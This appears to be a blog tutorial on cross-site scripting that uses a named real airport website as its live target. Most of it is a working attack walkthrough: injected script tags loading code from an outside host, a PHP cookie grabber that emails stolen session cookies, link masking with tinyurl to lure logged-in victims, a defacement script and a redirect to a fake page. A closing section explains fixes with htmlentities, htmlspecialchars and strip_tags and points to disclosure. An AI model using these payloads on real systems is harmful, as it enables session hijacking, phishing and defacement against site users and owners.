Find a xss’s vulnerable website is not very difficult.
In most cases can write in the search:

Code:
“><script>alert(‘try_xss’);</script>

This script does nothing more than send an alert on the screen, if you see the alert means that the script is taken into the site.

Now we try to write:

Code:

“><script>alert(‘document.cookie’);</script> or
“><script>alert(document.cookie);</script>

If this xss works, we will see on the screen the alert within our cookies session of the site.

Or if he had not run the url just check and see how it is generated:

Example:

Last xss that I have discovered is on “aeroporto di Puglia” website:

http://www.seap-puglia.it/

if we try to find “><script>alert(‘try_xss’);</script> nothing happens.
But now look at the url:

Link:

http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1=
%22%3E%3Cscript%3Ealert(‘try_xss’);%3C/script%3E&strRicerca2=
&strRicerca3=&sel1=AND&sel2=AND&RicInt1=1&RicInt2=0&RicInt3=0

we find the variable that makes it possible to search, in this case “strRicerca1”

Then apply the alert code directly after this variable:

Link:

http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&
strRicerca1=”><script>alert(‘try_xss’);</script>

We will magically appear the alert.

Now we try to write:

Link:

http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&str
Ricerca1=”><script>alert(document.cookie);</script>

Perfect! We see our cookie!

At this time we need to know the victim cookie and then comes in a “cookie grabbers”. Cookie grabber is a script that stay on our server and it include into website url to send us cookies directly by the victim 😀

If we want include a file with javascript we can write:

Code:

“><script src=”http://www.googlebig.com/cookiescript.js”></script>

Inside the file “cookiescript.js” we write a code that displays the cookie and sends it by e-mail.

At this time we need to know the victim cookie and then comes in a “cookie grabbers”. Cookie grabber is a script that stay on our server and it include into website url to send us cookies directly by the victim 😀

Howto include a javascript file:

Code:
"><script src="http://www.googlebig.com/cookiescript.js"></script>

Into cookiescript.js we will write a code that displays the cookie and sends it by email.

First of all we need to create a redirect to our site including the variable of cookies.

then:

Code:
<script>location.href="http://googlebig.com/cookie.php?cookie=</script>

Now we create cookie.php

Code:
<? mail("admin@googlebig.com","Here s the cookie stolen",$_GET['cookie']; ?>

Now upload cookie.php and cookiescript.js on our server and then go to:

Code:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca
1="><script src="http://www.googlebig.com/cookiescript.js"></script>

If everything works we will receiving cookie by email.

Now we send link to victim…we can send extended link or use a redirect service like http://www.tinyurl.com

Once created redirect, in this case http://tinyurl.com/2rgry5 , we can contact user, possibly through the same site to make sure that it open the link when it’s is logged on the site.

XSS THAT DOESN’T WORK

If a xss does not work and therefore do not have the chance of a redirect or not displaying cookies, it can be used as a phishing page.

An example of code is:

Code PHP:
var title = "XSSED BY GOOGLEBIG.COM";var bgcolor = "#000000";
var
image_url = "http://www.googlebig.com/googlebig.jpg";
var
text = "Langy was here ;)";var font_color = "#FFFFFF";
deface(title, bgcolor, image_url, text, font_color);
function
deface(pageTitle, bgColor, imageUrl, pageText, fontColor)
{
document.title = pageTitle;
document.body.innerHTML = '';
document.bgColor = bgColor;
var
overLay = document.createElement("div");
overLay.style.textAlign = 'center';
document.body.appendChild(overLay);
var
txt = document.createElement("p");
txt.style.font = 'normal normal bold 36px Verdana';
txt.style.color = fontColor; txt.innerHTML = pageText;
overLay.appendChild(txt);
if (
image_url != "") { var newImg = document.createElement("img");
newImg.setAttribute("border", '0');
newImg.setAttribute("src", imageUrl);
overLay.appendChild(newImg); }
var
footer = document.createElement("p");
footer.style.font = 'italic normal normal 12px Arial';
footer.style.color = '#DDDDDD'; footer.innerHTML = title;
overLay.appendChild(footer);}

This code must be entered in this way:

Code:

http://[Sitevictim]/page.php?variable="><script src="http://www.googlebig.com/script.js"></script>

In this way we will see javascript that we created.

Even in this case we can rely on tinyurl to mask our complete url and include directly redirect.

Code:
http://[Sitevictim]/page.php?variable="><script src="http://tinyurl.com/xxxxx"></script>

Another way to bring the victim on the page that we want is this:

Code:
http://[Sitevictim]/page.php?variable="><script>
location.href="http://www.googlebig.com/fakepage.htm</script>

For fix the problem of cross site injection we have to use one of the 3 functions php.

These functions clean up the HTML tags, so is not possible inject into the code.

The function more used is htmlspecialchars() that transmutes all the characters “<” and “>” into “&lt;” and “&gt”.

Another option is htmlentities(), which replaces all the characters in the corresponding entities.

Code PHP:
<?
// This page shows an example
// of the differences in output between 2 functions
$input = '<script>alert(1);</script>';
echo
htmlspecialchars($input) . '<br />';
echo
htmlentities($input);
?>
  • An example of htmlentities()
Code PHP:
<?php
$str
= "A 'quote' is <b>bold</b>";
echo
htmlentities($str);
echo
htmlentities($str, ENT_QUOTES);
?>

The first show –> A ‘quote’ is &lt;b&gt;bold&lt;/b&gt;
The second –> A &#039;quote&#039; is &lt;b&gt;bold&lt;/b&gt;

  • An example of htmlspecialchars()
Code PHP:
<?php
$new
= htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
echo
$new;
?>

This show –> &lt;a href=’test’&gt;Test&lt;/a&gt;
The funztion strip_tags(), instead, deletes all HTML elements, except certain elements that need to specify permitted such as <i>, <b> or <p>.

  • An example of strip_tags()
Code PHP:
<?php
$text
= '<p>Test paragraph.</p><!-- Comment --> Other text';
echo
strip_tags($text);
echo
"\n";
// allow <p>
echo strip_tags($text, '<p>');
?>

Now that we know at least that there are these functions, we will to apply into the code when we find a xss in our web application.

I have recently found a xss on my website in Video section of GoogleBig which is a plugin of Mybb forum, I have placed a piece of code to make the idea of how I had to apply the function to fix the search bug.

First of all I have found the php page in question: search.php

Now let’s look for the portion of code that makes available research, query and output the result of the query:

Code PHP:
function search($query, $page)
{
global
$db, $bgcolor2, $bgcolor4, $sitename, $io_db, $module_url, $list_page_items, $hm_index;
$option = trim($option);
$query = trim($query);
$query = FixQuotes(nl2br(filter_text($query)));
$db->escape_string($query);
$db->escape_string($option);
alpha_search($query);
...

In this case the variable that passes the values is $query then we apply the function htmlentities():

Code PHP:
$query = FixQuotes(nl2br(filter_text(htmlentities($query))));

If you have problems you can post here, or consult the manuals on these 3 php functions that we saw:

http://php.net/htmlentities
http://php.net/htmlspecialchars
http://php.net/strip_tags

This guide was created for information purposes only.

If u have found a xss u must post it here http://www.xssed.com/submit and u must contact the vulnerable site’s admin.

My Xssed websites: http://xssed.com/archive/author=Langy/

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>